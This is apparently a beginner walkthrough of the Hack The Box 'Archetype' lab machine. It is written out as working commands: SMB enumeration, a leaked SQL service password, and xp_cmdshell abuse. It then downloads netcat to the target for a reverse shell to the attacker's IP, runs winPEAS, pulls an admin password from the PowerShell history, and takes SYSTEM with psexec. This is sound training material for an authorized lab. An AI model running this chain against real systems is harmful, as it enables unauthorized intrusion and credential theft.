The aim of this walkthrough is to provide help with the Archetype machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 2 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
We could use the unset command to remove it after we no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: Which TCP port is hosting a database server?
We start our recon with a quick connection check.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ ping $rhost -c 4
PING 10.129.63.163 (10.129.63.163) 56(84) bytes of data.
64 bytes from 10.129.63.163: icmp_seq=1 ttl=127 time=12.0 ms
64 bytes from 10.129.63.163: icmp_seq=2 ttl=127 time=11.4 ms
64 bytes from 10.129.63.163: icmp_seq=3 ttl=127 time=11.7 ms
64 bytes from 10.129.63.163: icmp_seq=4 ttl=127 time=11.4 ms
--- 10.129.63.163 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 11.352/11.636/12.018/0.265 ms
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
Then we follow up on it with scanning the top 1000 tcp ports(version and script scan).
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ nmap -sC -sV $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 14:33 BST
Nmap scan report for 10.129.63.163
Host is up (0.057s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2023-05-11T13:33:22+00:00; +1s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-05-11T13:25:34
|_Not valid after: 2053-05-11T13:25:34
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h45m01s, deviation: 3h30m00s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-05-11T06:33:14-07:00
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-05-11T13:33:16
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
Four ports are reported to be open on our target. Additionally, there are some other interesting pieces of information to take note of:
- OS:Microsoft Windows
- sql server running on tcp port 1433
- guest login is enabled for port 445 (smb)
Let us capitalize on this information.
1433
TASK 2
Question: What is the name of the non-Administrative share available over SMB?
Using the guest username (guest-access) and listing the shares available on smb will directs us toward the backups share.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ smbclient -U guest -L $rhost
Password for [WORKGROUP\guest]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
backups
TASK 3
Question: What is the password identified in the file on the SMB share?
Accessing the share and listing it’s contents brings us to the - prod.dtsConfig - file.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ smbclient -U guest \\\\$rhost\\backups
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 12:20:57 2020
.. D 0 Mon Jan 20 12:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 12:23:02 2020
5056511 blocks of size 4096. 2531250 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (12.1 KiloBytes/sec) (average 12.1 KiloBytes/sec)
smb: \> exit
After the download is finished, opening it on our local machine will bring us a nice surprise.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
Even though it looks like some configuration file, there are some potential credentials hidden there.
potential credentials | |
---|---|
host | ARCHETYPE |
username | sql_svc |
password | M3g4c0rp123 |
But since proper recon is always the key, we make sure to check out the other shares too, even if they do not look that interesting at first sight.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ smbclient -U guest \\\\$rhost\\ADMIN$
Password for [WORKGROUP\guest]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ smbclient -U guest \\\\$rhost\\IPC$
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
We were right, nothing interesting there. But still, it never hurts to check.
M3g4c0rp123
TASK 4
Question: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
Once we have Impacket installed, using the tab-autocomplete feature can help us out.
─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ impacket-
impacket-addcomputer impacket-lookupsid impacket-rpcmap
impacket-atexec impacket-mimikatz impacket-sambaPipe
impacket-dcomexec impacket-mqtt_check impacket-samrdump
impacket-dpapi impacket-mssqlclient impacket-secretsdump
impacket-esentutl impacket-mssqlinstance impacket-services
impacket-exchanger impacket-netview impacket-smbclient
impacket-findDelegation impacket-nmapAnswerMachine impacket-smbexec
impacket-GetADUsers impacket-ntfs-read impacket-smbrelayx
impacket-getArch impacket-ntlmrelayx impacket-smbserver
impacket-GetNPUsers impacket-ping impacket-sniff
impacket-getPac impacket-ping6 impacket-sniffer
impacket-getST impacket-psexec impacket-split
impacket-getTGT impacket-raiseChild impacket-ticketConverter
impacket-GetUserSPNs impacket-rdp_check impacket-ticketer
impacket-goldenPac impacket-reg impacket-wmiexec
impacket-karmaSMB impacket-registry-read impacket-wmipersist
impacket-kintercept impacket-rpcdump impacket-wmiquery
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ impacket-
Therefore, it will come down to these noteworthy fellows:
- impacket-mssqlclient
- impacket-mssqlinstance
Checking them both out should make our choice quite easy.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ impacket-mssqlclient --help
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-file FILE]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address]
target
TDS client implementation (SSL supported).
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
optional arguments:
-h, --help show this help message and exit
-port PORT target MSSQL port (default 1433)
-db DB MSSQL database instance (default None)
-windows-auth whether or not to use Windows Authentication (default False)
-debug Turn DEBUG output ON
-file FILE input file with commands to execute in the SQL shell
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file
(KRB5CCNAME) based on target parameters. If valid credentials cannot
be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain
part (FQDN) specified in the target parameter
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$impacket-mssqlinstance --help
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
usage: mssqlinstance.py [-h] [-timeout TIMEOUT] host
Asks the remote host for its running MSSQL Instances.
positional arguments:
host target host
optional arguments:
-h, --help show this help message and exit
-timeout TIMEOUT timeout to wait for an answer
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
Since we already have the credentials, let’s try and connect to it. It is important to note, that without the -windows-auth optional argument our connection will not work.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ impacket-mssqlclient ARCHETYPE/sql_svc:M3g4c0rp123@$rhost -windows-auth
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
mssqlclient.py
TASK 5
Question: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
Using the built-in help command in our authenticated sql session should shine a light on our answer.
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL>
Trying to get some more information about what the xp_cmdshell command exactly does is a bust, but it does provide us with some further hints.
SQL> xp_cmdshell help
[-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL>
Breaking it down, it looks like it wanted to directly run the help as a command, but it was stopped, because the feature is not yet turned on. Enabling it sounds like a good idea, so let’s try it.
enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL>
Great, it looks like it actually worked and we could turn it on. Let’s try and run whoami and see if it runs.
SQL> xp_cmdshell whoami
output
-----------------
archetype\sql_svc
NULL
SQL>
Wow, it worked. But where are we exactly?
SQL> xp_cmdshell echo %cd%
output
-------------------
C:\Windows\system32
NULL
SQL>
What else can we run? Can we just grab the user flag from here directly?
SQL> xp_cmdshell "powershell cat C:\Users\sql_svc\Desktop\user.txt"
output
--------------------------------
<flag>
NULL
SQL>
Actually, we can and we just did. But communicating with our target this way (via the interactive sql shell) is quite cumbersome. So our next course of action should be to get a reverse shell on the target.
In a nutshell, it could look something like this:
- making netcat binary available on lhost (local machine)
- using the interactive sql terminal to download this binary to the target machine
- creating a netcat listener on lhost
- runing the netcat binary on the target via the interactive sql shell to connect back to lhost
So let’s start with #1: Our first action should be to download the windows netcat binary (nc64.exe) and store it on our local machine.
Running the server module from the http pyhton package (in the same directory) will start a local server and make all the files in that directory accessible.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ ll
total 48K
-rw-r--r-- 1 htb-bluewalle htb-bluewalle 45K May 11 16:20 nc64.exe
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
Continuing with #2: We go back to our interactive sql shell. Then we try downloading the binary using both powershell and wget (previously alias for Invoke-WebRequest).
Our first attempt is to download the file (from our current directory) and then save it to - C:\Users\sql_svc\Downloads - (where we have write access), but we get an error…
SQL> xp_cmdshell "powershell -c wget http://10.10.14.46:4444/nc64.exe -outfile C:\Users\sql_svc\Downloads"
output
--------------------------------------------------------------------------------
wget : Access to the path 'C:\Users\sql_svc\Downloads' is denied.
At line:1 char:1
+ wget http://10.10.14.46:4444/nc64.exe -outfile C:\Users\sql_svc\Downl ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Invoke-WebRequest], UnauthorizedAccessException
+ FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
NULL
SQL>
In our second attempt, we first head to - C:\Users\sql_svc\Downloads - and only after we changed directory, do we try to download the binary.
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.46:4444/nc64.exe -outfile nc64.exe"
output
------
NULL
SQL>
This time we are successful and our binary is located at - C:\Users\sql_svc\Downloads\nc64.exe -.
SQL> xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads"
output
--------------------------------------------------------------------------------
NULL
NULL
Directory: C:\Users\sql_svc\Downloads
NULL
NULL
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/11/2023 8:57 AM 45272 nc64.exe
NULL
NULL
NULL
SQL>
We shut down the http server right after the download has finished.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
10.129.63.163 - - [11/May/2023 16:56:39] "GET /nc64.exe HTTP/1.1" 200 -
10.129.63.163 - - [11/May/2023 16:57:33] "GET /nc64.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
Now for #3: It’s time to start our listener.
# on lhost
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Finally (#4): We try to run the netcat binary on the target and instruct it to connect back to our local machine.
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.46 4444"
No output here. Did it work…? Once we head over to the listener from #3, we will see that we got a reverse shell back. So it actually worked.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.63.163.
Ncat: Connection from 10.129.63.163:49680.
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\sql_svc\Downloads>
Let’s use our new (and much better) connection to grab the user flag (again).
C:\Users\sql_svc\Downloads>whoami
whoami
archetype\sql_svc
C:\Users\sql_svc\Downloads>cd ..\Desktop\
cd ..\Desktop\
C:\Users\sql_svc\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:37 AM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 10,711,236,608 bytes free
C:\Users\sql_svc\Desktop>type user.txt
type user.txt
<flag>
C:\Users\sql_svc\Desktop>
xp_cmdshell
TASK 6
Question: What script can be used in order to search possible paths to escalate privileges on Windows hosts?
One of the most commonly used scripts for privilege escalation on windows is winpeas.
Let bring it over to our target. We go through the same motions as before:
- pyhton http server where the file is located at - lhost
- use powershell and wget to copy it over - rhost
Since winpeas is already downloaded to pwnbox, locating it seems like the only thing still left for us to do. It might take some time, but it can be found at
/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe
Then, we copy it over to our working directory.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ [★]$ cp winPEASx64.exe ~/archetype/
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ [★]$
Once there, we head over and start our http server.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ [★]$ cd ~/archetype/
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
Then we use our reverse shell to download it to rhost.
C:\Users\sql_svc\Downloads>powershell -c wget http://10.10.14.46:4444/winPEASx64.exe -outfile winPEASx64.exe
powershell -c wget http://10.10.14.46:4444/winPEASx64.exe -outfile winPEASx64.exe
C:\Users\sql_svc\Downloads>
Once downloaded, we close up the http server.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
10.129.63.163 - - [11/May/2023 18:06:33] "GET /winPEASx64.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
All that’s left for us is to run it.
C:\Users\sql_svc\Downloads>powershell -c .\winPEASx64.exe
powershell -c .\winPEASx64.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
*((,.,/((((((((((((((((((((/, */
,/*,..*((((((((((((((((((((((((((((((((((,
,*/((((((((((((((((((/, .*//((//**, .*(((((((*
((((((((((((((((**********/########## .(* ,(((((((
(((((((((((/********************/####### .(. (((((((
((((((..******************/@@@@@/***/###### ./(((((((
,,....********************@@@@@@@@@@(***,#### .//((((((
, ,..********************/@@@@@%@@@@/********##((/ /((((
..((###########*********/%@@@@@@@@@/************,,..((((
.(##################(/******/@@@@@/***************.. /((
.(#########################(/**********************..*((
.(##############################(/*****************.,(((
.(###################################(/************..(((
.(#######################################(*********..(((
.(#######(,.***.,(###################(..***.*******..(((
.(#######*(#####((##################((######/(*****..(((
.(###################(/***********(##############(...(((
.((#####################/*******(################.((((((
.(((############################################(..((((
..(((##########################################(..(((((
....((########################################( .(((((
......((####################################( .((((((
(((((((((#################################(../((((((
(((((((((/##########################(/..((((((
(((((((((/,. ,*//////*,. ./(((((((((((((((.
(((((((((((((((((((((((((((((/
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
WinPEASng by @carlospolopm, makikvues(makikvues2[at]gmail[dot]com)
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
[+] Legend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
� You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
Creating Dynamic lists, this could take a while, please wait...
- Loading YAML definitions file...
- Checking if domain...
- Getting Win32_UserAccount info...
- Creating current user groups list...
- Creating active users list (local only)...
- Creating disabled users list...
- Admin users list...
- Creating AppLocker bypass list...
- Creating files/directories list for search...
����������������������������������� System Information �������������������������������������
���������� Basic System Information
� Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
Hostname: Archetype
ProductName: Windows Server 2019 Standard
EditionID: ServerStandard
ReleaseId: 1809
BuildBranch: rs5_release
CurrentMajorVersionNumber: 10
CurrentVersion: 6.3
Architecture: AMD64
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC-08:00) Pacific Time (US & Canada)
IsVirtualMachine: True
Current Time: 5/11/2023 10:08:59 AM
HighIntegrity: False
PartOfDomain: False
Hotfixes: KB5004335, KB5003711, KB5004244,
[?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
[*] OS Version: 1809 (17763)
[*] Enumerating installed KBs...
[!] CVE-2019-0836 : VULNERABLE
[>] https://exploit-db.com/exploits/46718
[>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
[!] CVE-2019-0841 : VULNERABLE
[>] https://github.com/rogue-kdc/CVE-2019-0841
[>] https://rastamouse.me/tags/cve-2019-0841/
[!] CVE-2019-1064 : VULNERABLE
[>] https://www.rythmstick.net/posts/cve-2019-1064/
[!] CVE-2019-1130 : VULNERABLE
[>] https://github.com/S3cur3Th1sSh1t/SharpByeBear
[!] CVE-2019-1253 : VULNERABLE
[>] https://github.com/padovah4ck/CVE-2019-1253
[>] https://github.com/sgabe/CVE-2019-1253
[!] CVE-2019-1315 : VULNERABLE
[>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html
[!] CVE-2019-1385 : VULNERABLE
[>] https://www.youtube.com/watch?v=K6gHnr-VkAg
[!] CVE-2019-1388 : VULNERABLE
[>] https://github.com/jas502n/CVE-2019-1388
[!] CVE-2019-1405 : VULNERABLE
[>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
[>] https://github.com/apt69/COMahawk
[!] CVE-2020-0668 : VULNERABLE
[>] https://github.com/itm4n/SysTracingPoc
[!] CVE-2020-0683 : VULNERABLE
[>] https://github.com/padovah4ck/CVE-2020-0683
[>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1
[!] CVE-2020-1013 : VULNERABLE
[>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/
[*] Finished. Found 12 potential vulnerabilities.
...
...
...
���������� Analyzing Windows Files Files (limit 70)
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
C:\Users\Default\NTUSER.DAT
C:\Users\sql_svc\NTUSER.DAT
���������� Analyzing Other Windows Files Files (limit 70)
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
C:\Users\sql_svc\Downloads>
winpeas
TASK 7
Question: What file contains the administrator’s password?
The output from winPEAS is quite lengthly (only a snippet is shown in TASK6), but one of the last lines mentioned the location of the powershell history file.
...
���������� Analyzing Windows Files Files (limit 70)
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
...
Checking it will lead us to some administrator credentials.
C:\Users\sql_svc\Downloads>type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
C:\Users\sql_svc\Downloads>
ConsoleHost_history.txt
SUBMIT FLAG
Question: Submit user flag
In TASK5 we used two different approaches to grab the user flag.
flag
SUBMIT FLAG
Question: Submit root flag
We can use the
admin credentials | |
---|---|
username | administrator |
password | MEGACORP_4dm1n!! |
found in TASK7 to get an admin shell on the target. Using psexec from impacket will land us system privileges.
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ impacket-psexec administrator@$rhost
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
Password:
[*] Requesting shares on 10.129.63.163.....
[*] Found writable share ADMIN$
[*] Uploading file ZUxKInhO.exe
[*] Opening SVCManager on 10.129.63.163.....
[*] Creating service EEnc on 10.129.63.163.....
[*] Starting service EEnc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows>
These high-level privileges provide us with access to the administrator’s desktop - C:\Windows>cd C:\Users\Administrator\Desktop - This is where our root flag resides.
C:\Windows>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\Administrator\Desktop
07/27/2021 02:30 AM <DIR> .
07/27/2021 02:30 AM <DIR> ..
02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 10,689,736,704 bytes free
C:\Users\Administrator\Desktop>
All left for now is to grab the root flag and terminate the connection.
C:\Users\Administrator\Desktop>type root.txt
<flag>
C:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 10.129.63.163.....
[*] Stopping service EEnc.....
[*] Removing service EEnc.....
[*] Removing file ZUxKInhO.exe.....
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$
flag
Congratulations, we just successfully pwned the target machine. All we have left to do now is to terminate the target box (if not terminated automatically) before we continue with the next box!